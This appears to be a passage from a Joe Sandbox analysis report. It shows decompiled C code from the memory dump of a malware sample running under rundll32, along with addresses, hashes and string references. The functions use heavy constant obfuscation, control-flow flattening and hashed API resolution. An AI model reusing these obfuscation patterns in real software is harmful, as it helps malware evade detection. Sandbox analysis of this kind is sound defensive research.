								break;
							}
							if(__eflags >= 0) {
								_t110 = _t108 + 2 + _t134;
								__eflags = _t108 + 2 + _t134;
							} else {
								_t110 = _t108 & 0x0000ffff;
							}
							_t111 = E007A6CA0( *((intOrPtr*)(_t136 + 0x34)),  *((intOrPtr*)(_t136 + 0x2c)), _t110,  *((intOrPtr*)(_t136 + 0x24)),  *(_t136 + 0x18), _t121);
							_t136 = _t136 + 0x10;
							__eflags = _t111;
							if(_t111 == 0) {
								goto L15;
							} else {
								_t121 =  *(_t136 + 0x18);
								_t132 =  &(_t132[2]);
								 *_t113 = _t111;
								_t113 = _t113 + 4;
								__eflags = _t113;
								continue;
							}
						}
						_t133 = _t133 + 0x14;
						__eflags = _t133;
					}
					goto L13;
				}
			}

0x007a7c3c
0x007a7c42
0x007a7c43
0x007a7c47
0x007a7c4b
0x007a7c4c
0x007a7c4d
0x007a7c52
0x007a7c5a
0x007a7c5d
0x007a7c6e
0x007a7c71
0x007a7c75
0x007a7c7d
0x007a7c8d
0x007a7c91
0x007a7c99
0x007a7ca1
0x007a7ca9
0x007a7cb1
0x007a7cb9
0x007a7cc1
0x007a7ccd
0x007a7cd0
0x007a7cd4
0x007a7ce1
0x007a7ce5
0x007a7ced
0x007a7cf5
0x007a7cfa
0x007a7d02
0x007a7d0a
0x007a7d12
0x007a7d17
0x007a7d1f
0x007a7d27
0x007a7d31
0x007a7d35
0x007a7d3d
0x007a7d4a
0x007a7d4e
0x007a7d56
0x007a7d5b
0x007a7d66
0x007a7d6a
0x007a7d6c
0x007a7d72
0x007a7df1
0x00000000
0x007a7d7b
0x007a7d7b
0x007a7dea
0x007a7dea
0x007a7def
0x00000000
0x00000000
0x007a7d96
0x007a7d98
0x007a7d9c
0x007a7d9e
0x007a7dfc
0x00000000
0x007a7dfc
0x007a7da5
0x007a7da7
0x007a7de1
0x007a7de1
0x007a7de3
0x007a7de5
0x00000000
0x00000000
0x007a7dab
0x007a7db5
0x007a7db5
0x007a7dad
0x007a7dad
0x007a7dad
0x007a7dc9
0x007a7dce
0x007a7dd1
0x007a7dd3
0x00000000
0x007a7dd5
0x007a7dd5
0x007a7dd9
0x007a7ddc
0x007a7dde
0x007a7dde
0x00000000
0x007a7dde
0x007a7dd3
0x007a7de7
0x007a7de7
0x007a7de7
0x00000000
0x007a7dea

Strings

c`, xrefs: 007A7CED
X^wE, xrefs: 007A7CB9

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: X^wE$c`
API String ID: 0-1321574684
Opcode ID: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
Instruction ID: cf370196de27941bdb9e1f6c5b323234068158680fc8267d9fe20a52e9cf90f9
Opcode Fuzzy Hash: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
Instruction Fuzzy Hash: 585184726083029FC718DF24D88692BBBE1FFC5358F50891DF48696221E379DA48CF96

Uniqueness

Uniqueness Score: -1.00%

Function 007A4C5D Relevance: 2.6, Strings: 2, Instructions: 98
COMMONCrypto

Download Yara Rule

C-Code - Quality: 62%

			E007A4C5D(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _t106;
				void* _t108;
				intOrPtr* _t109;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t128;

				_v44 = _v44 & 0x00000000;
				_v48 = 0xad4f7a;
				_v16 = 0xf18dbd;
				_v16 = _v16 + 0xffff4795;
				_v16 = _v16 << 0xe;
				_v16 = _v16 >> 6;
				_v16 = _v16 ^ 0x00dff17e;
				_v12 = 0xaf5949;
				_v12 = _v12 | 0xe2d389df;
				_v12 = _v12 + 0x286;
				_t112 = 3;
				_v12 = _v12 / _t112;
				_v12 = _v12 ^ 0x4ba32b72;
				_v24 = 0x2aefd1;
				_t113 = 0x7d;
				_t128 = _a4;
				_v24 = _v24 * 0x59;
				_v24 = _v24 << 2;
				_v24 = _v24 ^ 0x3bb9ca43;
				_v8 = 0x985427;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x713a2c3c;
				_v8 = _v8 | 0x45eb1ca3;
				_v8 = _v8 ^ 0x77f5f6d4;
				_v28 = 0xa7f2b4;
				_v28 = _v28 >> 0xc;
				_v28 = _v28 + 0x7e4a;
				_v28 = _v28 ^ 0x000cc7a8;
				_v40 = 0x7087c6;
				_t114 = 0x69;
				_v40 = _v40 / _t113;
				_v40 = _v40 ^ 0x00014835;
				_v20 = 0xcde00b;
				_v20 = _v20 + 0xffffcf30;
				_v20 = _v20 | 0xcdf6f1c4;
				_v20 = _v20 + 0xfc2b;
				_v20 = _v20 ^ 0xce0272c5;
				_v36 = 0x30875a;
				_v36 = _v36 * 0x47;
				_v36 = _v36 / _t114;
				_v36 = _v36 ^ 0x0028facf;
				_v32 = 0x6c449b;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 + 0xffff12fc;
				_v32 = _v32 ^ 0xfff19483;
				_t106 =  *((intOrPtr*)(_t128 + 0x1c))( *((intOrPtr*)(_t128 + 0x38)), 1, 0);
				_t134 = _t106;
				if(_t106 != 0) {
					_push(_v8);
					_push(_v24);
					_push(_v12);
					_t108 = E007B8606(_v16, 0x7a1378, _t134);
					_push(_v20);
					_t130 = _t108;
					_push(_t108);
					_push(_v40);
					_t109 = E007ACBDF(_v28,  *((intOrPtr*)(_t128 + 0x38)));
					if(_t109 != 0) {
						 *_t109();
					}
					E007AA8B0(_v36, _t130, _v32);
				}
				return 0;
			}

0x007a4c63
0x007a4c69
0x007a4c70
0x007a4c77
0x007a4c7e
0x007a4c82
0x007a4c86
0x007a4c8d
0x007a4c94
0x007a4c9b
0x007a4ca8
0x007a4cad
0x007a4cb2
0x007a4cb9
0x007a4cc4
0x007a4cc7
0x007a4cca
0x007a4ccd
0x007a4cd1
0x007a4cd8
0x007a4cdf
0x007a4ce3
0x007a4cea
0x007a4cf1
0x007a4cf8
0x007a4cff
0x007a4d03
0x007a4d0a
0x007a4d11
0x007a4d1d
0x007a4d1e
0x007a4d23
0x007a4d2a
0x007a4d31
0x007a4d38
0x007a4d3f
0x007a4d46
0x007a4d4d
0x007a4d5c
0x007a4d64
0x007a4d67
0x007a4d6e
0x007a4d75
0x007a4d79
0x007a4d80
0x007a4d8a
0x007a4d8d
0x007a4d8f
0x007a4d92
0x007a4d9a
0x007a4d9d
0x007a4da3
0x007a4da8
0x007a4dab
0x007a4dad
0x007a4dae
0x007a4db7
0x007a4dc1
0x007a4dc3
0x007a4dc3
0x007a4dcd
0x007a4dd3
0x007a4dda

Strings

J~, xrefs: 007A4D03
<,:q, xrefs: 007A4CE3

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: <,:q$J~
API String ID: 0-951887683
Opcode ID: 663067ec8ac8326e3b561317c86eaf416254731e9a34c6f5e3af6e4d58b376d5
Instruction ID: fa61583ec189b769a6672338aac60c7790a85ba442327cbc09a85680c69ba0fa
Opcode Fuzzy Hash: 663067ec8ac8326e3b561317c86eaf416254731e9a34c6f5e3af6e4d58b376d5
Instruction Fuzzy Hash: 54410E71D0130AEBDF48CFA1C94AAEEBBB1FB54314F208159D510BA2A0D7B91B55CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 007AEE81 Relevance: 2.6, Strings: 2, Instructions: 95
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E007AEE81(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				short _v48;
				short _v52;
				intOrPtr _v56;
				char _v576;
				intOrPtr* _t95;
				signed int _t99;
				signed int _t100;

				_v56 = 0x3b8b1c;
				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_v8 = 0xf9e323;
				_v8 = _v8 ^ 0x73816ffa;
				_v8 = _v8 + 0x5b26;
				_v8 = _v8 ^ 0x387262e7;
				_v8 = _v8 ^ 0x4b076809;
				_v20 = 0x75aab0;
				_v20 = _v20 ^ 0xc40c30fa;
				_v20 = _v20 + 0x78e9;
				_v20 = _v20 ^ 0xc4737271;
				_v16 = 0xa8e87a;
				_v16 = _v16 + 0xffff799a;
				_t99 = 0x33;
				_v16 = _v16 / _t99;
				_v16 = _v16 ^ 0x000fed3f;
				_v28 = 0x7feeb5;
				_v28 = _v28 + 0xffffe4f6;
				_v28 = _v28 ^ 0x007d0c9c;
				_v32 = 0x59c916;
				_t100 = 0x5d;
				_v32 = _v32 / _t100;
				_v32 = _v32 ^ 0x000d1fec;
				_v12 = 0x866588;
				_v12 = _v12 ^ 0x68ade4cb;
				_v12 = _v12 + 0xffffbaa5;
				_v12 = _v12 ^ 0x68223e43;
				_v36 = 0xbafac2;
				_v36 = _v36 ^ 0x5e34b155;
				_v36 = _v36 ^ 0x5e8c811c;
				_v24 = 0xc770cb;
				_v24 = _v24 >> 0xf;
				_v24 = _v24 ^ 0x95635bf4;
				_v24 = _v24 ^ 0x956359d7;
				_v40 = 0xbd0b83;
				_v40 = _v40 >> 3;
				_v40 = _v40 ^ 0x001e2563;
				_t101 = _v8;
				if(E007B8F15(_v8,  &_v576, _t100, _v20, _v16, _v28) != 0) {
					_t95 =  &_v576;
					if(_v576 != 0) {
						while( *_t95 != 0x5c) {
							_t95 = _t95 + 2;
							if( *_t95 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						_t101 = 0;
						 *((short*)(_t95 + 2)) = 0;
					}
					L6:
					E007BDB43(_t101,  &_v44, _t101, _v32, _t101,  &_v576, _t101, _v12, _t101, _v36, _v24, _v40);
				}
				return _v44;
			}

0x007aee8a
0x007aee96
0x007aee99
0x007aee9c
0x007aee9f
0x007aeea6
0x007aeead
0x007aeeb4
0x007aeebb
0x007aeec2
0x007aeec9
0x007aeed0
0x007aeed7
0x007aeede
0x007aeee5
0x007aeef1
0x007aeef6
0x007aeefb
0x007aef02
0x007aef09
0x007aef10
0x007aef17
0x007aef21
0x007aef2a
0x007aef2d
0x007aef34
0x007aef3b
0x007aef48
0x007aef4f
0x007aef56
0x007aef5d
0x007aef64
0x007aef6b
0x007aef72
0x007aef76
0x007aef7d
0x007aef84
0x007aef8b
0x007aef8f
0x007aefa0
0x007aefad
0x007aefaf
0x007aefbc
0x007aefbe
0x007aefc4
0x007aefca
0x00000000
0x00000000
0x007aefcc
0x00000000
0x007aefca
0x007aefce
0x007aefd0
0x007aefd0
0x007aefd4
0x007aeff2
0x007aeff7
0x007af001

Strings

br8, xrefs: 007AEEB4
C>"h, xrefs: 007AEF4F

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: C>"h$br8
API String ID: 0-573140060
Opcode ID: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
Instruction ID: d99fb44f3e8a4c1cb18c5732b12487ce51fea4c8d7a751a232b14bed00ee5115
Opcode Fuzzy Hash: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
Instruction Fuzzy Hash: 3741F172C01219EBCF58CFE4C94A5EEBBB5FB04304F20819AE515B6260E3B85A55CF90

Uniqueness

Uniqueness Score: -1.00%

Function 007BAA30 Relevance: 2.6, Strings: 2, Instructions: 67
COMMONCrypto

Download Yara Rule

C-Code - Quality: 88%

			E007BAA30(signed int __edx, intOrPtr _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _t83;
				signed int _t85;
				signed int _t91;

				_v40 = _v40 & 0x00000000;
				_v48 = 0xea50c7;
				_v44 = 0x183406;
				_v8 = 0x4cb37c;
				_v8 = _v8 + 0xc736;
				_v8 = _v8 + 0xd4a7;
				_t91 = __edx;
				_t85 = 0x64;
				_v8 = _v8 * 0x2d;
				_v8 = _v8 ^ 0x0dcd94f9;
				_v24 = 0x238f3e;
				_v24 = _v24 << 3;
				_v24 = _v24 ^ 0x011b8be3;
				_v20 = 0x73abc8;
				_v20 = _v20 >> 3;
				_v20 = _v20 ^ 0x00035013;
				_v16 = 0x5012b6;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 / _t85;
				_v16 = _v16 ^ 0x000aff4c;
				_v12 = 0x8c34bb;
				_v12 = _v12 | 0x8c5a3f77;
				_v12 = _v12 + 0xffff11fb;
				_v12 = _v12 ^ 0x2d4fbea1;
				_v12 = _v12 ^ 0xa19c1e56;
				_v36 = 0xff820a;
				_v36 = _v36 | 0x4fe4a4bc;
				_v36 = _v36 ^ 0x4ffdd4f4;
				_v32 = 0x36506a;
				_v32 = _v32 + 0x4de;
				_v32 = _v32 ^ 0x003709b9;
				_v28 = 0x64fd3b;
				_v28 = _v28 + 0xffff3e7a;
				_v28 = _v28 ^ 0x00656766;
				if( *((intOrPtr*)(0x7c3210 + __edx * 4)) == 0) {
					_t83 = E007B0A0E(_t85, _t85, _a4);
					_push(_v28);
					_push(_a12);
					_push(_v32);
					_push(_t83);
					 *((intOrPtr*)(0x7c3210 + _t91 * 4)) = E007ACDCD(_v12, _v36);
				}
				return  *((intOrPtr*)(0x7c3210 + _t91 * 4));
			}

0x007baa36
0x007baa3a
0x007baa41
0x007baa48
0x007baa4f
0x007baa56
0x007baa62
0x007baa68
0x007baa69
0x007baa6c
0x007baa73
0x007baa7a
0x007baa7e
0x007baa85
0x007baa8c
0x007baa90
0x007baa97
0x007baa9e
0x007baaa7
0x007baaaa
0x007baab1
0x007baab8
0x007baabf
0x007baac6
0x007baacd
0x007baad4
0x007baadb
0x007baae2
0x007baae9
0x007baaf0
0x007baaf7
0x007baafe
0x007bab05
0x007bab0c
0x007bab1b
0x007bab2e
0x007bab33
0x007bab36
0x007bab39
0x007bab42
0x007bab4b
0x007bab4b
0x007bab5d

Strings

jP6, xrefs: 007BAAE9
fge, xrefs: 007BAB0C

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: fge$jP6
API String ID: 0-775479084
Opcode ID: 7ce16b2120532955a82a8ba77472461d0f7aebbcfaafd65a96e348ae0abecccc
Instruction ID: 7fa3bb835c8a26042113f9210e53b0f429fa9b278b2df84b0ab00e6e0710669c
Opcode Fuzzy Hash: 7ce16b2120532955a82a8ba77472461d0f7aebbcfaafd65a96e348ae0abecccc
Instruction Fuzzy Hash: 8831EFB1C0020DEBCF08CFA4CA4A9EEBBB5FB09308F108148D511B6220C3B95B49DF95

Uniqueness

Uniqueness Score: -1.00%

Function 007C0E3A Relevance: 2.6, Strings: 2, Instructions: 61
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E007C0E3A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t61;
				intOrPtr _t66;
				void* _t73;
				intOrPtr* _t74;

				_t74 = _a16;
				_push(_t74);
				_push(_a12);
				_t73 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E007B20B9(_t61);
				_v16 = 0x2b4f5d;
				_v16 = _v16 * 0x1c;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x000abada;
				_v24 = 0x6f176d;
				_v24 = _v24 | 0x8892b5fd;
				_v24 = _v24 ^ 0x88fd6dba;
				_v12 = 0x9049ef;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x7aa47b64;
				_v12 = _v12 ^ 0x7aa68413;
				_a16 = 0x9c064;
				_a16 = _a16 + 0x4e6a;
				_a16 = _a16 + 0xffffd44e;
				_a16 = _a16 | 0x475ceb65;
				_a16 = _a16 ^ 0x47532e3d;
				_v8 = 0xaf6c6f;
				_v8 = _v8 >> 6;
				_v8 = _v8 + 0xad29;
				_v8 = _v8 + 0xd52;
				_v8 = _v8 ^ 0x000b7d9e;
				_v20 = 0xd79f7b;
				_v20 = _v20 ^ 0x214a9efd;
				_v20 = _v20 >> 5;
				_v20 = _v20 ^ 0x010f9d8f;
				E007B0DAF(_v16, __ecx, _v24,  *((intOrPtr*)(_t74 + 4)), _v12, _a16);
				E007AED7E(_v8,  *((intOrPtr*)(__ecx + 0x24)), _v20,  *_t74,  *((intOrPtr*)(_t74 + 4)));
				_t66 =  *((intOrPtr*)(_t74 + 4));
				 *((intOrPtr*)(_t73 + 0x24)) =  *((intOrPtr*)(_t73 + 0x24)) + _t66;
				return _t66;
			}

0x007c0e41
0x007c0e45
0x007c0e46
0x007c0e49
0x007c0e4b
0x007c0e4e
0x007c0e52
0x007c0e53
0x007c0e58
0x007c0e65
0x007c0e68
0x007c0e6c
0x007c0e73
0x007c0e7a
0x007c0e81
0x007c0e88
0x007c0e8f
0x007c0e93
0x007c0e9a
0x007c0ea1
0x007c0ea8
0x007c0eaf
0x007c0eb6
0x007c0ebd
0x007c0ec4
0x007c0ecb
0x007c0ecf
0x007c0ed6
0x007c0edd
0x007c0ee4
0x007c0eeb
0x007c0ef2
0x007c0ef6
0x007c0f0c
0x007c0f1f
0x007c0f24
0x007c0f2a
0x007c0f32

Strings

]O+, xrefs: 007C0E58
=.SG, xrefs: 007C0EBD

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: =.SG$]O+
API String ID: 0-348654084
Opcode ID: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
Instruction ID: bf2fcb7348aeae10e8aff1919226b6ff65379101eedbaed09d123e5c77912dc6
Opcode Fuzzy Hash: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
Instruction Fuzzy Hash: D021367180120DEFCF05DFA4DA0A4EEBBB1FF45304F108558E91562225C3759B24DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001CD16 Relevance: 1.9, APIs: 1, Instructions: 445COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 1001CD1D

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
Instruction ID: 700ec683b01abb9f9f773201453a4dcf188a8b347697539dbb350c7cd9cff270
Opcode Fuzzy Hash: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
Instruction Fuzzy Hash: D5F15E7460020ABFDB15EF54C890EAE7BE9EF08350F10852AF925AF291D734ED81DB61

Uniqueness

Uniqueness Score: -1.00%

Function 007B044F Relevance: 1.5, Strings: 1, Instructions: 287
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E007B044F() {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* _t309;
				intOrPtr _t310;
				void* _t311;
				intOrPtr _t321;
				intOrPtr _t325;
				void* _t329;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr _t369;
				void* _t373;
				intOrPtr _t374;
				void* _t379;
				signed int* _t383;

				_t383 =  &_v140;
				_v16 = 0x8f0e94;
				_v12 = 0x9bdfd3;
				_t329 = 0;
				_v8 = _v8 & 0;
				_v4 = _v4 & 0;
				_v68 = 0xf0a33d;
				_v68 = _v68 ^ 0x64690d06;
				_v68 = _v68 >> 7;
				_v68 = _v68 ^ 0x00c9335c;
				_v96 = 0x45a6c;
				_v96 = _v96 + 0xffff2947;
				_v96 = _v96 >> 0x10;
				_v96 = _v96 ^ 0x00000003;
				_v56 = 0xab09eb;
				_v56 = _v56 | 0x7e070137;
				_v56 = _v56 ^ 0x7eaf09ff;
				_v80 = 0xa0f766;
				_v80 = _v80 | 0xafeefcb7;
				_v80 = _v80 ^ 0xafeefff7;
				_v48 = 0xf26de0;
				_v48 = _v48 + 0xffff1ff1;
				_v48 = _v48 ^ 0x00f18dd1;
				_v76 = 0x20d89d;
				_v76 = _v76 + 0xffff51c8;
				_v76 = _v76 | 0xd50d8457;
				_v76 = _v76 ^ 0xd52cfd33;
				_v136 = 0x1fce72;
				_v136 = _v136 >> 0xe;
				_v136 = _v136 | 0xd51e44d2;
				_t331 = 7;
				_v136 = _v136 / _t331;
				_v136 = _v136 ^ 0x1e7b1fff;
				_t379 = 0x1e2498b;
				_v92 = 0x2fa0bb;
				_v92 = _v92 >> 7;
				_v92 = _v92 << 1;
				_v92 = _v92 ^ 0x0000a534;
				_v52 = 0x3913b;
				_t332 = 0x4f;
				_v52 = _v52 / _t332;
				_v52 = _v52 ^ 0x00068b65;
				_v104 = 0xfffd78;
				_v104 = _v104 | 0x3b05e9e1;
				_v104 = _v104 + 0x741e;
				_v104 = _v104 ^ 0x7591a7da;
				_v104 = _v104 ^ 0x4990882f;
				_v84 = 0xe3d15a;
				_v84 = _v84 << 8;
				_v84 = _v84 ^ 0xbeb387df;
				_v84 = _v84 ^ 0x5d62ae1e;
				_v24 = 0xb3d42d;
				_v24 = _v24 | 0x6ee5a57e;
				_v24 = _v24 ^ 0x6efe8c67;
				_v60 = 0x6708ad;
				_v60 = _v60 + 0xd3fd;
				_v60 = _v60 ^ 0x0061923e;
				_v128 = 0x5551d4;
				_t333 = 0x50;
				_v128 = _v128 / _t333;
				_t334 = 0x7a;
				_v128 = _v128 / _t334;
				_t335 = 0x7e;
				_v128 = _v128 * 0x46;
				_v128 = _v128 ^ 0x000c63e9;
				_v28 = 0xd668f8;
				_v28 = _v28 << 0x10;
				_v28 = _v28 ^ 0x68f34519;
				_v112 = 0x194a18;
				_v112 = _v112 / _t335;
				_v112 = _v112 | 0xa7c33fbe;
				_t336 = 0x65;
				_v112 = _v112 / _t336;
				_v112 = _v112 ^ 0x01a285cf;
				_v44 = 0xc79794;
				_v44 = _v44 ^ 0x35aba003;
				_v44 = _v44 ^ 0x356e5b19;
				_v140 = 0x380362;
				_t337 = 0x79;
				_v140 = _v140 * 5;
				_v140 = _v140 ^ 0x1d7b2daf;
				_v140 = _v140 + 0x590f;
				_v140 = _v140 ^ 0x1c6cd8ab;
				_v120 = 0x1c8328;
				_v120 = _v120 / _t337;
				_t338 = 0xa;
				_v120 = _v120 / _t338;
				_v120 = _v120 | 0x9d020d0f;
				_v120 = _v120 ^ 0x9d02076d;
				_v124 = 0x55cbd6;
				_v124 = _v124 >> 9;
				_v124 = _v124 >> 0xc;
				_v124 = _v124 >> 6;
				_v124 = _v124 ^ 0x000fb83a;
				_v132 = 0xf0ac8c;
				_v132 = _v132 | 0x3804c269;
				_v132 = _v132 >> 1;
				_v132 = _v132 + 0xffff8da8;
				_v132 = _v132 ^ 0x1c781e64;
				_v88 = 0x7992e8;
				_v88 = _v88 | 0xba3027fa;
				_v88 = _v88 >> 9;
				_v88 = _v88 ^ 0x0051fda0;
				_v36 = 0x7aefbd;
				_v36 = _v36 + 0xfffff4eb;
				_v36 = _v36 ^ 0x0078a7fc;
				_v40 = 0xf56b46;
				_v40 = _v40 + 0xffff9ce0;
				_v40 = _v40 ^ 0x00fe48d4;
				_v108 = 0x27569f;
				_v108 = _v108 + 0x2c0a;
				_v108 = _v108 ^ 0xb442ac8c;
				_v108 = _v108 ^ 0xdc856b2a;
				_v108 = _v108 ^ 0x68e3c0da;
				_v116 = 0xbcba21;
				_v116 = _v116 << 0xd;
				_v116 = _v116 << 8;
				_v116 = _v116 >> 6;
				_v116 = _v116 ^ 0x011b605a;
				_v32 = 0x87c31e;
				_v32 = _v32 ^ 0x05bc26b1;
				_v32 = _v32 ^ 0x05363b16;
				_v100 = 0x4be1cd;
				_v100 = _v100 + 0xffff13dd;
				_v100 = _v100 | 0xdbf19b4f;
				_v100 = _v100 >> 7;
				_v100 = _v100 ^ 0x01b90151;
				_v64 = 0xb1223e;
				_v64 = _v64 | 0xb1fef6fe;
				_v64 = _v64 ^ 0xb1f65c82;
				_v72 = 0x9ef2a7;
				_v72 = _v72 * 0x66;
				_v72 = _v72 + 0xffffefd1;
				_v72 = _v72 ^ 0x3f51caaf;
				while(1) {
					L1:
					while(1) {
						_t309 = 0x546d98;
						do {
							L3:
							if(_t379 == _t309) {
								_t310 =  *0x7c3e00; // 0x0
								_t339 = _v56;
								_t311 = E007B0DD6(_t339, _v124, _v132, _v20,  *((intOrPtr*)(_t310 + 0x14)),  *((intOrPtr*)(_t310 + 0x10)), _v88, _v36);
								_t383 =  &(_t383[6]);
								__eflags = _t311 - _v80;
								if(__eflags != 0) {
									_t379 = 0x64eb485;
									goto L14;
								} else {
									_t379 = 0xb6ab68a;
									_t329 = 1;
									goto L1;
								}
							} else {
								if(_t379 == 0x19763e8) {
									_push(_v128);
									_push(_v60);
									__eflags = E007A9462(E007BDCF7(_v24, 0x7a17f8, __eflags), _v112,  &_v20, 0, _v44, _v68) - _v96;
									_t339 = _v140;
									_t379 =  ==  ? 0x546d98 : 0x64eb485;
									E007AA8B0(_t339, _t313, _v120);
									_t383 =  &(_t383[8]);
									L14:
									_t369 =  *0x7c3e00; // 0x0
									_t309 = 0x546d98;
									goto L15;
								} else {
									if(_t379 == 0x1e2498b) {
										_push(_t339);
										_push(_t339);
										_t373 = 0x28;
										_t321 = E007A7FF2(_t373);
										 *0x7c3e00 = _t321;
										 *((intOrPtr*)(_t321 + 0x14)) = 0x4000;
										_t374 =  *0x7c3e00; // 0x0
										_t325 = E007A7FF2( *((intOrPtr*)(_t374 + 0x14)));
										_t369 =  *0x7c3e00; // 0x0
										_t379 = 0x19763e8;
										_t339 =  *((intOrPtr*)(_t369 + 0x14)) + _t325;
										 *((intOrPtr*)(_t369 + 0x10)) = _t325;
										 *((intOrPtr*)(_t369 + 0x1c)) = _t325;
										 *((intOrPtr*)(_t369 + 0x24)) = _t325;
										 *(_t369 + 4) = _t339;
										_t309 = 0x546d98;
										continue;
									} else {
										if(_t379 == 0x64eb485) {
											E007B8519(_v32, _v100,  *((intOrPtr*)(_t369 + 0x10)));
											E007B8519(_v64, _v72,  *0x7c3e00);
										} else {
											if(_t379 != 0xb6ab68a) {
												goto L15;
											} else {
												E007A957D(_v20, _v40, _v108, _v48, _v116);
											}
										}
									}
								}
							}
							L18:
							return _t329;
							L15:
							__eflags = _t379 - 0xfde45c5;
						} while (__eflags != 0);
